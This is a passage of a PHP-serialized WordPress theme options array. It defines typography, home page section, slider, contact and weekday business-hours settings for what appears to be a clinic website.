entry.\";s:2:\"id\";s:20:\"nice_font_post_entry\";s:3:\"std\";a:5:{s:4:\"size\";s:2:\"14\";s:4:\"unit\";s:2:\"px\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:0:\"\";s:5:\"color\";s:7:\"#757B83\";}s:4:\"type\";s:10:\"typography\";}i:32;a:5:{s:4:\"name\";s:15:\"Welcome Message\";s:4:\"desc\";s:32:\"Change the welcome message font.\";s:2:\"id\";s:25:\"nice_font_welcome_message\";s:3:\"std\";a:5:{s:4:\"size\";s:2:\"38\";s:4:\"unit\";s:2:\"px\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:0:\"\";s:5:\"color\";s:7:\"#43484D\";}s:4:\"type\";s:10:\"typography\";}i:33;a:5:{s:4:\"name\";s:26:\"Welcome Message (extended)\";s:4:\"desc\";s:41:\"Change the extended welcome message font.\";s:2:\"id\";s:34:\"nice_font_welcome_message_extended\";s:3:\"std\";a:5:{s:4:\"size\";s:2:\"14\";s:4:\"unit\";s:2:\"px\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:0:\"\";s:5:\"color\";s:7:\"#757B83\";}s:4:\"type\";s:10:\"typography\";}i:34;a:5:{s:4:\"name\";s:12:\"Slider Title\";s:4:\"desc\";s:22:\"Change the post title.\";s:2:\"id\";s:22:\"nice_font_slider_title\";s:3:\"std\";a:5:{s:4:\"size\";s:2:\"38\";s:4:\"unit\";s:2:\"px\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:0:\"\";s:5:\"color\";s:7:\"#FFFFFF\";}s:4:\"type\";s:10:\"typography\";}i:35;a:5:{s:4:\"name\";s:14:\"Slider Content\";s:4:\"desc\";s:26:\"Change the slider content.\";s:2:\"id\";s:24:\"nice_font_slider_content\";s:3:\"std\";a:5:{s:4:\"size\";s:2:\"17\";s:4:\"unit\";s:2:\"px\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:0:\"\";s:5:\"color\";s:7:\"#FFFFFF\";}s:4:\"type\";s:10:\"typography\";}i:36;a:2:{s:4:\"name\";s:12:\"Home Options\";s:4:\"type\";s:7:\"heading\";}i:37;a:6:{s:4:\"name\";s:19:\"Enable Social Links\";s:4:\"desc\";s:60:\"This will enable the social links section on your home page.\";s:2:\"id\";s:18:\"nice_social_enable\";s:3:\"std\";s:4:\"true\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:38;a:6:{s:4:\"name\";s:15:\"Welcome Message\";s:4:\"desc\";s:28:\"Insert your Welcome Message.\";s:2:\"id\";s:20:\"nice_welcome_message\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:39;a:6:{s:4:\"name\";s:26:\"Welcome Message (extended)\";s:4:\"desc\";s:37:\"Insert your extended Welcome Message.\";s:2:\"id\";s:29:\"nice_welcome_message_extended\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:40;a:6:{s:4:\"name\";s:12:\"Enable Staff\";s:4:\"desc\";s:62:\"This will enable the staff items to be shown in the home page.\";s:2:\"id\";s:17:\"nice_staff_enable\";s:3:\"std\";s:4:\"true\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:41;a:6:{s:4:\"name\";s:11:\"Staff Title\";s:4:\"desc\";s:92:\"Insert a title for the staff section in the home page. Leave it blank if you don\'t want one.\";s:2:\"id\";s:16:\"nice_staff_title\";s:3:\"std\";s:17:\"Our Professionals\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:42;a:7:{s:4:\"name\";s:11:\"Staff Order\";s:4:\"desc\";s:75:\"Select the view order you wish to set for the staff items on the home page.\";s:2:\"id\";s:16:\"nice_staff_order\";s:3:\"std\";s:4:\"date\";s:4:\"type\";s:6:\"select\";s:3:\"tip\";s:0:\"\";s:7:\"options\";a:4:{s:4:\"date\";s:4:\"Date\";s:10:\"menu_order\";s:10:\"Page Order\";s:5:\"title\";s:5:\"Title\";s:4:\"rand\";s:6:\"Random\";}}i:43;a:6:{s:4:\"name\";s:17:\"Staff Button Text\";s:4:\"desc\";s:90:\"Insert a text for the staff button in the home page. Leave it blank if you don\'t want one.\";s:2:\"id\";s:22:\"nice_staff_button_text\";s:3:\"std\";s:22:\"Meet Our Professionals\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:44;a:6:{s:4:\"name\";s:16:\"Staff Button URL\";s:4:\"desc\";s:90:\"Insert an URL for the staff button in the home page. Leave it blank if you don\'t want one.\";s:2:\"id\";s:21:\"nice_staff_button_url\";s:3:\"std\";s:39:\"http://theworstpain.com/Neuro/our-staff\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:45;a:6:{s:4:\"name\";s:15:\"Enable Services\";s:4:\"desc\";s:65:\"This will enable the services items to be shown in the home page.\";s:2:\"id\";s:19:\"nice_service_enable\";s:3:\"std\";s:4:\"true\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:46;a:6:{s:4:\"name\";s:14:\"Services Title\";s:4:\"desc\";s:95:\"Insert a title for the services section in the home page. Leave it blank if you don\'t want one.\";s:2:\"id\";s:18:\"nice_service_title\";s:3:\"std\";s:12:\"Our Services\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:47;a:7:{s:4:\"name\";s:14:\"Services Order\";s:4:\"desc\";s:78:\"Select the view order you wish to set for the services items on the home page.\";s:2:\"id\";s:18:\"nice_service_order\";s:3:\"std\";s:4:\"date\";s:4:\"type\";s:6:\"select\";s:3:\"tip\";s:0:\"\";s:7:\"options\";a:4:{s:4:\"date\";s:4:\"Date\";s:10:\"menu_order\";s:10:\"Page Order\";s:5:\"title\";s:5:\"Title\";s:4:\"rand\";s:6:\"Random\";}}i:48;a:6:{s:4:\"name\";s:19:\"Enable Testimonials\";s:4:\"desc\";s:69:\"This will enable the testimonials items to be shown in the home page.\";s:2:\"id\";s:23:\"nice_testimonial_enable\";s:3:\"std\";s:4:\"true\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:49;a:6:{s:4:\"name\";s:18:\"Testimonials Title\";s:4:\"desc\";s:99:\"Insert a title for the testimonials section in the home page. Leave it blank if you don\'t want one.\";s:2:\"id\";s:22:\"nice_testimonial_title\";s:3:\"std\";s:28:\"What our patients are saying\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:50;a:7:{s:4:\"name\";s:18:\"Testimonials Order\";s:4:\"desc\";s:82:\"Select the view order you wish to set for the testimonials items on the home page.\";s:2:\"id\";s:22:\"nice_testimonial_order\";s:3:\"std\";s:4:\"date\";s:4:\"type\";s:6:\"select\";s:3:\"tip\";s:0:\"\";s:7:\"options\";a:4:{s:4:\"date\";s:4:\"Date\";s:10:\"menu_order\";s:10:\"Page Order\";s:5:\"title\";s:5:\"Title\";s:4:\"rand\";s:6:\"Random\";}}i:51;a:6:{s:4:\"name\";s:25:\"Testimonial\'s Button Text\";s:4:\"desc\";s:97:\"Insert a text for the testimonials button in the home page. Leave it blank if you don\'t want one.\";s:2:\"id\";s:28:\"nice_testimonial_button_text\";s:3:\"std\";s:22:\"Read more testimonials\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:52;a:6:{s:4:\"name\";s:23:\"Testimonials Button URL\";s:4:\"desc\";s:97:\"Insert an URL for the testimonials button in the home page. Leave it blank if you don\'t want one.\";s:2:\"id\";s:27:\"nice_testimonial_button_url\";s:3:\"std\";s:38:\"http://theworstpain.com/Neuro/feedback\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:53;a:2:{s:4:\"name\";s:14:\"Slider Options\";s:4:\"type\";s:7:\"heading\";}i:54;a:6:{s:4:\"name\";s:13:\"Enable Slider\";s:4:\"desc\";s:34:\"Enable the slider on the homepage.\";s:2:\"id\";s:11:\"nice_slider\";s:3:\"std\";s:4:\"true\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:55;a:7:{s:4:\"name\";s:14:\"Slider Entries\";s:4:\"desc\";s:72:\"Select the number of entries that should appear in the home page slider.\";s:2:\"id\";s:19:\"nice_slider_entries\";s:3:\"std\";s:1:\"3\";s:4:\"type\";s:6:\"select\";s:3:\"tip\";s:0:\"\";s:7:\"options\";a:20:{i:0;s:32:\"Select the number from this list\";i:1;i:1;i:2;i:2;i:3;i:3;i:4;i:4;i:5;i:5;i:6;i:6;i:7;i:7;i:8;i:8;i:9;i:9;i:10;i:10;i:11;i:11;i:12;i:12;i:13;i:13;i:14;i:14;i:15;i:15;i:16;i:16;i:17;i:17;i:18;i:18;i:19;i:19;}}i:56;a:7:{s:4:\"name\";s:6:\"Effect\";s:4:\"desc\";s:28:\"Select the animation effect.\";s:2:\"id\";s:21:\"nice_slider_animation\";s:4:\"type\";s:6:\"select\";s:3:\"std\";s:4:\"fade\";s:3:\"tip\";s:0:\"\";s:7:\"options\";a:2:{s:5:\"slide\";s:5:\"Slide\";s:4:\"fade\";s:4:\"Fade\";}}i:57;a:6:{s:4:\"name\";s:13:\"Reverse Order\";s:4:\"desc\";s:32:\"Reverse the animation direction.\";s:2:\"id\";s:19:\"nice_slider_reverse\";s:3:\"std\";s:5:\"false\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:58;a:6:{s:4:\"name\";s:11:\"Hover Pause\";s:4:\"desc\";s:38:\"Hovering over slideshow will pause it.\";s:2:\"id\";s:26:\"nice_slider_pause_on_hover\";s:3:\"std\";s:5:\"false\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:59;a:6:{s:4:\"name\";s:9:\"Randomize\";s:4:\"desc\";s:27:\"Select to randomize slides.\";s:2:\"id\";s:21:\"nice_slider_randomize\";s:3:\"std\";s:5:\"false\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:60;a:6:{s:4:\"name\";s:14:\"Animation loop\";s:4:\"desc\";s:26:\"Should the animation loop?\";s:2:\"id\";s:26:\"nice_slider_animation_loop\";s:3:\"std\";s:5:\"false\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:61;a:6:{s:4:\"name\";s:15:\"Animation Speed\";s:4:\"desc\";s:70:\"The time in <b>miliseconds</b> the animation between frames will take.\";s:2:\"id\";s:27:\"nice_slider_animation_speed\";s:3:\"std\";s:3:\"600\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:62;a:6:{s:4:\"name\";s:10:\"Auto Start\";s:4:\"desc\";s:46:\"Set the slider to start sliding automatically.\";s:2:\"id\";s:21:\"nice_slider_slideshow\";s:3:\"std\";s:5:\"false\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:63;a:6:{s:4:\"name\";s:19:\"Auto Slide Interval\";s:4:\"desc\";s:82:\"The time in <b>milliseconds</b> each slide pauses for, before sliding to the next.\";s:2:\"id\";s:27:\"nice_slider_slideshow_speed\";s:3:\"std\";s:4:\"7000\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:64;a:6:{s:4:\"name\";s:28:\"Enable Slider Pagination Bar\";s:4:\"desc\";s:47:\"Check this option to enable the pagination bar.\";s:2:\"id\";s:23:\"nice_slider_control_nav\";s:3:\"std\";s:5:\"false\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:65;a:6:{s:4:\"name\";s:24:\"Previous/Next Navigation\";s:4:\"desc\";s:57:\"Check this option to enable navigation for previous/next.\";s:2:\"id\";s:25:\"nice_slider_direction_nav\";s:3:\"std\";s:4:\"true\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:66;a:6:{s:4:\"name\";s:15:\"Display Caption\";s:4:\"desc\";s:68:\"Check this option to display the caption and content for each slide.\";s:2:\"id\";s:19:\"nice_slider_caption\";s:3:\"std\";s:4:\"true\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:67;a:2:{s:4:\"name\";s:19:\"Contact Information\";s:4:\"type\";s:7:\"heading\";}i:68;a:6:{s:4:\"name\";s:26:\"Contact Form Email Address\";s:4:\"desc\";s:116:\"Enter the email address where you\'d like to receive emails from the contact form, or leave blank to use admin email.\";s:2:\"id\";s:10:\"nice_email\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:69;a:6:{s:4:\"name\";s:15:\"Contact Address\";s:4:\"desc\";s:46:\"The physical address for the contact template.\";s:2:\"id\";s:12:\"nice_address\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:70;a:6:{s:4:\"name\";s:22:\"Google Maps Embed Code\";s:4:\"desc\";s:58:\"Insert the Google Map embed code for the contact template.\";s:2:\"id\";s:15:\"nice_google_map\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:71;a:2:{s:4:\"name\";s:14:\"Business Setup\";s:4:\"type\";s:7:\"heading\";}i:72;a:6:{s:4:\"name\";s:12:\"Phone Number\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:17:\"nice_phone_number\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:73;a:6:{s:4:\"name\";s:12:\"Hours Format\";s:4:\"desc\";s:219:\"The format in which the business hours will be displayed. Default is \'h:i A\'. To customise this field you must understand php\'s <a href=\"http://php.net/manual/en/function.date.php\" target=\"_blank\">date() formatting</a>.\";s:2:\"id\";s:17:\"nice_hours_format\";s:3:\"std\";s:5:\"h:i A\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:74;a:7:{s:4:\"name\";s:21:\"Monday Business Hours\";s:4:\"desc\";s:142:\"Use <strong>CTRL+Click (Windows)</strong> or <strong>CMD+Click (Mac)</strong> to select the times for which your business is open on a Monday.\";s:2:\"id\";s:17:\"nice_monday_hours\";s:3:\"std\";s:1:\"0\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:15:\"select_multiple\";s:7:\"options\";a:49:{i:0;s:6:\"Closed\";s:5:\"01:00\";s:5:\"01:00\";s:5:\"01:30\";s:5:\"01:30\";s:5:\"02:00\";s:5:\"02:00\";s:5:\"02:30\";s:5:\"02:30\";s:5:\"03:00\";s:5:\"03:00\";s:5:\"03:30\";s:5:\"03:30\";s:5:\"04:00\";s:5:\"04:00\";s:5:\"04:30\";s:5:\"04:30\";s:5:\"05:00\";s:5:\"05:00\";s:5:\"05:30\";s:5:\"05:30\";s:5:\"06:00\";s:5:\"06:00\";s:5:\"06:30\";s:5:\"06:30\";s:5:\"07:00\";s:5:\"07:00\";s:5:\"07:30\";s:5:\"07:30\";s:5:\"08:00\";s:5:\"08:00\";s:5:\"08:30\";s:5:\"08:30\";s:5:\"09:00\";s:5:\"09:00\";s:5:\"09:30\";s:5:\"09:30\";s:5:\"10:00\";s:5:\"10:00\";s:5:\"10:30\";s:5:\"10:30\";s:5:\"11:00\";s:5:\"11:00\";s:5:\"11:30\";s:5:\"11:30\";s:5:\"12:00\";s:5:\"12:00\";s:5:\"12:30\";s:5:\"12:30\";s:5:\"13:00\";s:5:\"13:00\";s:5:\"13:30\";s:5:\"13:30\";s:5:\"14:00\";s:5:\"14:00\";s:5:\"14:30\";s:5:\"14:30\";s:5:\"15:00\";s:5:\"15:00\";s:5:\"15:30\";s:5:\"15:30\";s:5:\"16:00\";s:5:\"16:00\";s:5:\"16:30\";s:5:\"16:30\";s:5:\"17:00\";s:5:\"17:00\";s:5:\"17:30\";s:5:\"17:30\";s:5:\"18:00\";s:5:\"18:00\";s:5:\"18:30\";s:5:\"18:30\";s:5:\"19:00\";s:5:\"19:00\";s:5:\"19:30\";s:5:\"19:30\";s:5:\"20:00\";s:5:\"20:00\";s:5:\"20:30\";s:5:\"20:30\";s:5:\"21:00\";s:5:\"21:00\";s:5:\"21:30\";s:5:\"21:30\";s:5:\"22:00\";s:5:\"22:00\";s:5:\"22:30\";s:5:\"22:30\";s:5:\"23:00\";s:5:\"23:00\";s:5:\"23:30\";s:5:\"23:30\";s:5:\"24:00\";s:5:\"24:00\";s:5:\"24:30\";s:5:\"24:30\";}}i:75;a:7:{s:4:\"name\";s:22:\"Tuesday Business Hours\";s:4:\"desc\";s:143:\"Use <strong>CTRL+Click (Windows)</strong> or <strong>CMD+Click (Mac)</strong> to select the times for which your business is open on a Tuesday.\";s:2:\"id\";s:18:\"nice_tuesday_hours\";s:3:\"std\";s:1:\"0\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:15:\"select_multiple\";s:7:\"options\";a:49:{i:0;s:6:\"Closed\";s:5:\"01:00\";s:5:\"01:00\";s:5:\"01:30\";s:5:\"01:30\";s:5:\"02:00\";s:5:\"02:00\";s:5:\"02:30\";s:5:\"02:30\";s:5:\"03:00\";s:5:\"03:00\";s:5:\"03:30\";s:5:\"03:30\";s:5:\"04:00\";s:5:\"04:00\";s:5:\"04:30\";s:5:\"04:30\";s:5:\"05:00\";s:5:\"05:00\";s:5:\"05:30\";s:5:\"05:30\";s:5:\"06:00\";s:5:\"06:00\";s:5:\"06:30\";s:5:\"06:30\";s:5:\"07:00\";s:5:\"07:00\";s:5:\"07:30\";s:5:\"07:30\";s:5:\"08:00\";s:5:\"08:00\";s:5:\"08:30\";s:5:\"08:30\";s:5:\"09:00\";s:5:\"09:00\";s:5:\"09:30\";s:5:\"09:30\";s:5:\"10:00\";s:5:\"10:00\";s:5:\"10:30\";s:5:\"10:30\";s:5:\"11:00\";s:5:\"11:00\";s:5:\"11:30\";s:5:\"11:30\";s:5:\"12:00\";s:5:\"12:00\";s:5:\"12:30\";s:5:\"12:30\";s:5:\"13:00\";s:5:\"13:00\";s:5:\"13:30\";s:5:\"13:30\";s:5:\"14:00\";s:5:\"14:00\";s:5:\"14:30\";s:5:\"14:30\";s:5:\"15:00\";s:5:\"15:00\";s:5:\"15:30\";s:5:\"15:30\";s:5:\"16:00\";s:5:\"16:00\";s:5:\"16:30\";s:5:\"16:30\";s:5:\"17:00\";s:5:\"17:00\";s:5:\"17:30\";s:5:\"17:30\";s:5:\"18:00\";s:5:\"18:00\";s:5:\"18:30\";s:5:\"18:30\";s:5:\"19:00\";s:5:\"19:00\";s:5:\"19:30\";s:5:\"19:30\";s:5:\"20:00\";s:5:\"20:00\";s:5:\"20:30\";s:5:\"20:30\";s:5:\"21:00\";s:5:\"21:00\";s:5:\"21:30\";s:5:\"21:30\";s:5:\"22:00\";s:5:\"22:00\";s:5:\"22:30\";s:5:\"22:30\";s:5:\"23:00\";s:5:\"23:00\";s:5:\"23:30\";s:5:\"23:30\";s:5:\"24:00\";s:5:\"24:00\";s:5:\"24:30\";s:5:\"24:30\";}}i:76;a:7:{s:4:\"name\";s:24:\"Wednesday Business Hours\";s:4:\"desc\";s:145:\"Use <strong>CTRL+Click (Windows)</strong> or <strong>CMD+Click (Mac)</strong> to select the times for which your business is open on a Wednesday.\";s:2:\"id\";s:20:\"nice_wednesday_hours\";s:3:\"std\";s:1:\"0\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:15:\"select_multiple\";s:7:\"options\";a:49:{i:0;s:6:\"Closed\";s:5:\"01:00\";s:5:\"01:00\";s:5:\"01:30\";s:5:\"01:30\";s:5:\"02:00\";s:5:\"02:00\";s:5:\"02:30\";s:5:\"02:30\";s:5:\"03:00\";s:5:\"03:00\";s:5:\"03:30\";s:5:\"03:30\";s:5:\"04:00\";s:5:\"04:00\";s:5:\"04:30\";s:5:\"04:30\";s:5:\"05:00\";s:5:\"05:00\";s:5:\"05:30\";s:5:\"05:30\";s:5:\"06:00\";s:5:\"06:00\";s:5:\"06:30\";s:5:\"06:30\";s:5:\"07:00\";s:5:\"07:00\";s:5:\"07:30\";s:5:\"07:30\";s:5:\"08:00\";s:5:\"08:00\";s:5:\"08:30\";s:5:\"08:30\";s:5:\"09:00\";s:5:\"09:00\";s:5:\"09:30\";s:5:\"09:30\";s:5:\"10:00\";s:5:\"10:00\";s:5:\"10:30\";s:5:\"10:30\";s:5:\"11:00\";s:5:\"11:00\";s:5:\"11:30\";s:5:\"11:30\";s:5:\"12:00\";s:5:\"12:00\";s:5:\"12:30\";s:5:\"12:30\";s:5:\"13:00\";s:5:\"13:00\";s:5:\"13:30\";s:5:\"13:30\";s:5:\"14:00\";s:5:\"14:00\";s:5:\"14:30\";s:5:\"14:30\";s:5:\"15:00\";s:5:\"15:00\";s:5:\"15:30\";s:5:\"15:30\";s:5:\"16:00\";s:5:\"16:00\";s:5:\"16:30\";s:5:\"16:30\";s:5:\"17:00\";s:5:\"17:00\";s:5:\"17:30\";s:5:\"17:30\";s:5:\"18:00\";s:5:\"18:00\";s:5:\"18:30\";s:5:\"18:30\";s:5:\"19:00\";s:5:\"19:00\";s:5:\"19:30\";s:5:\"19:30\";s:5:\"20:00\";s:5:\"20:00\";s:5:\"20:30\";s:5:\"20:30\";s:5:\"21:00\";s:5:\"21:00\";s:5:\"21:30\";s:5:\"21:30\";s:5:\"22:00\";s:5:\"22:00\";s:5:\"22:30\";s:5:\"22:30\";s:5:\"23:00\";s:5:\"23:00\";s:5:\"23:30\";s:5:\"23:30\";s:5:\"24:00\";s:5:\"24:00\";s:5:\"24:30\";s:5:\"24:30\";}}i:77;a:7:{s:4:\"name\";s:23:\"Thursday Business Hours\";s:4:\"desc\";s:144:\"Use <strong>CTRL+Click (Windows)</strong> or <strong>CMD+Click (Mac)</strong> to select the times for which your business is open on a Thursday.\";s:2:\"id\";s:19:\"nice_thursday_hours\";s:3:\"std\";s:1:\"0\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:15:\"select_multiple\";s:7:\"options\";a:49:{i:0;s:6:\"Closed\";s:5:\"01:00\";s:5:\"01:00\";s:5:\"01:30\";s:5:\"01:30\";s:5:\"02:00\";s:5:\"02:00\";s:5:\"02:30\";s:5:\"02:30\";s:5:\"03:00\";s:5:\"03:00\";s:5:\"03:30\";s:5:\"03:30\";s:5:\"04:00\";s:5:\"04:00\";s:5:\"04:30\";s:5:\"04:30\";s:5:\"05:00\";s:5:\"05:00\";s:5:\"05:30\";s:5:\"05:30\";s:5:\"06:00\";s:5:\"06:00\";s:5:\"06:30\";s:5:\"06:30\";s:5:\"07:00\";s:5:\"07:00\";s:5:\"07:30\";s:5:\"07:30\";s:5:\"08:00\";s:5:\"08:00\";s:5:\"08:30\";s:5:\"08:30\";s:5:\"09:00\";s:5:\"09:00\";s:5:\"09:30\";s:5:\"09:30\";s:5:\"10:00\";s:5:\"10:00\";s:5:\"10:30\";s:5:\"10:30\";s:5:\"11:00\";s:5:\"11:00\";s:5:\"11:30\";s:5:\"11:30\";s:5:\"12:00\";s:5:\"12:00\";s:5:\"12:30\";s:5:\"12:30\";s:5:\"13:00\";s:5:\"13:00\";s:5:\"13:30\";s:5:\"13:30\";s:5:\"14:00\";s:5:\"14:00\";s:5:\"14:30\";s:5:\"14:30\";s:5:\"15:00\";s:5:\"15:00\";s:5:\"15:30\";s:5:\"15:30\";s:5:\"16:00\";s:5:\"16:00\";s:5:\"16:30\";s:5:\"16:30\";s:5:\"17:00\";s:5:\"17:00\";s:5:\"17:30\";s:5:\"17:30\";s:5:\"18:00\";s:5:\"18:00\";s:5:\"18:30\";s:5:\"18:30\";s:5:\"19:00\";s:5:\"19:00\";s:5:\"19:30\";s:5:\"19:30\";s:5:\"20:00\";s:5:\"20:00\";s:5:\"20:30\";s:5:\"20:30\";s:5:\"21:00\";s:5:\"21:00\";s:5:\"21:30\";s:5:\"21:30\";s:5:\"22:00\";s:5:\"22:00\";s:5:\"22:30\";s:5:\"22:30\";s:5:\"23:00\";s:5:\"23:00\";s:5:\"23:30\";s:5:\"23:30\";s:5:\"24:00\";s:5:\"24:00\";s:5:\"24:30\";s:5:\"24:30\";}}i:78;a:7:{s:4:\"name\";s:21:\"Friday Business Hours\";s:4:\"desc\";s:142:\"Use <strong>CTRL+Click (Windows)</strong> or <strong>CMD+Click (Mac)</strong> to select the times for which your business is open on a Friday.\";s:2:\"id\";s:17:\"nice_friday_hours\";s:3:\"std\";s:1:\"0\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:15:\"select_multiple\";s:7:\"options\";a:49:{i:0;s:6:\"Closed\";s:5:\"01:00\";s:5:\"01:00\";s:5:\"01:30\";s:5:\"01:30\";s:5:\"02:00\";s:5:\"02:00\";s:5:\"02:30\";s:5:\"02:30\";s:5:\"03:00\";s:5:\"03:00\";s:5:\"03:30\";s:5:\"03:30\";s:5:\"04:00\";s:5:\"04:00\";s:5:\"04:30\";s:5:\"04:30\";s:5:\"05:00\";s:5:\"05:00\";s:5:\"05:30\";s:5:\"05:30\";s:5:\"06:00\";s:5:\"06:00\";s:5:\"06:30\";s:5:\"06:30\";s:5:\"07:00\";s:5:\"07:00\";s:5:\"07:30\";s:5:\"07:30\";s:5:\"08:00\";s:5:\"08:00\";s:5:\"08:30\";s:5:\"08:30\";s:5:\"09:00\";s:5:\"09:00\";s:5:\"09:30\";s:5:\"09:30\";s:5:\"10:00\";s:5:\"10:00\";s:5:\"10:30\";s:5:\"10:30\";s:5:\"11:00\";s:5:\"11:00\";s:5:\"11:30\";s:5:\"11:30\";s:5:\"12:00\";s:5:\"12:00\";s:5:\"12:30\";s:5:\"12:30\";s:5:\"13:00\";s:5:\"13:00\";s:5:\"13:30\";s:5:\"13:30\";s:5:\"14:00\";s:5:\"14:00\";s:5:\"14:30\";s:5:\"14:30\";s:5:\"15:00\";s:5:\"15:00\";s:5:\"15:30\";s:5:\"15:30\";s:5:\"16:00\";s:5:\"16:00\";s:5:\"16:30\";s:5:\"16:30\";s:5:\"17:00\";s:5:\"17:00\";s:5:\"17:30\";s:5:\"17:30\";s:5:\"18:00\";s:5:\"18:00\";s:5:\"18:30\";s:5:\"18:30\";s:5:\"19:00\";s:5:\"19:00\";s:5:\"19:30\";s:5:\"19:30\";s:5:\"20:00\";s:5:\"20:00\";s:5:\"20:30\";s:5:\"20:30\";s:5:\"21:00\";s:5:\"21:00\";s:5:\"21:30\";s:5:\"21:30\";s:5:\"22:00\";s:5:\"22:00\";s:5:\"22:30\";s:5:\"22:30\";s:5:\"23:00\";s:5:\"23:00\";s:5:\"23:30\";s:5:\"23:30\";s:5:\"24:00\";s:5:\"24:00\";s:5:\"24:30\";s:5:\"24:30\";}}i:79;a:7:{s:4:\"name\";s:23:\"Saturday Business Hours\";s:4:\"desc\";s:144:\"Use <strong>CTRL+Click (Windows)</strong> or <strong>CMD+Click (Mac)</strong> to select the times for which your business is open on a Saturday.\";s:2:\"id\";s:19:\"nice_saturday_hours\";s:3:\"std\";s:1:\"0\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:15:\"select_multiple\";s:7:\"options\";a:49:{i:0;s:6:\"Closed\";s:5:\"01:00\";s:5:\"01:00\";s:5:\"01:30\";s:5:\"01:30\";s:5:\"02:00\";s:5:\"02:00\";s:5:\"02:30\";s:5:\"02:30\";s:5:\"03:00\";s:5:\"03:00\";s:5:\"03:30\";s:5:\"03:30\";s:5:\"04:00\";s:5:\"04:00\";s:5:\"04:30\";s:5:\"04:30\";s:5:\"05:00\";s:5:\"05:00\";s:5:\"05:30\";s:5:\"05:30\";s:5:\"06:00\";s:5:\"06:00\";s:5:\"06:30\";s:5:\"06:30\";s:5:\"07:00\";s:5:\"07:00\";s:5:\"07:30\";s:5:\"07:30\";s:5:\"08:00\";s:5:\"08:00\";s:5:\"08:30\";s:5:\"08:30\";s:5:\"09:00\";s:5:\"09:00\";s:5:\"09:30\";s:5:\"09:30\";s:5:\"10:00\";s:5:\"10:00\";s:5:\"10:30\";s:5:\"10:30\";s:5:\"11:00\";s:5:\"11:00\";s:5:\"11:30\";s:5:\"11:30\";s:5:\"12:00\";s:5:\"12:00\";s:5:\"12:30\";s:5:\"12:30\";s:5:\"13:00\";s:5:\"13:00\";s:5:\"13:30\";s:5:\"13:30\";s:5:\"14:00\";s:5:\"14:00\";s:5:\"14:30\";s:5:\"14:30\";s:5:\"15:00\";s:5:\"15:00\";s:5:\"15:30\";s:5:\"15:30\";s:5:\"16:00\";s:5:\"16:00\";s:5:\"16:30\";s:5:\"16:30\";s:5:\"17:00\";s:5:\"17:00\";s:5:\"17:30\";s:5:\"17:30\";s:5:\"18:00\";s:5:\"18:00\";s:5:\"18:30\";s:5:\"18:30\";s:5:\"19:00\";s:5:\"19:00\";s:5:\"19:30\";s:5:\"19:30\";s:5:\"20:00\";s:5:\"20:00\";s:5:\"20:30\";s:5:\"20:30\";s:5:\"21:00\";s:5:\"21:00\";s:5:\"21:30\";s:5:\"21:30\";s:5:\"22:00\";s:5:\"22:00\";s:5:\"22:30\";s:5:\"22:30\";s:5:\"23:00\";s:5:\"23:00\";s:5:\"23:30\";s:5:\"23:30\";s:5:\"24:00\";s:5:\"24:00\";s:5:\"24:30\";s:5:\"24:30\";}}i:80;a:7:{s:4:\"name\";s:21:\"Sunday Business Hours\";s:4:\"desc\";s:142:\"Use <strong>CTRL+Click (Windows)</strong> or <strong>CMD+Click (Mac)</strong> to select the times for which your business is open on a 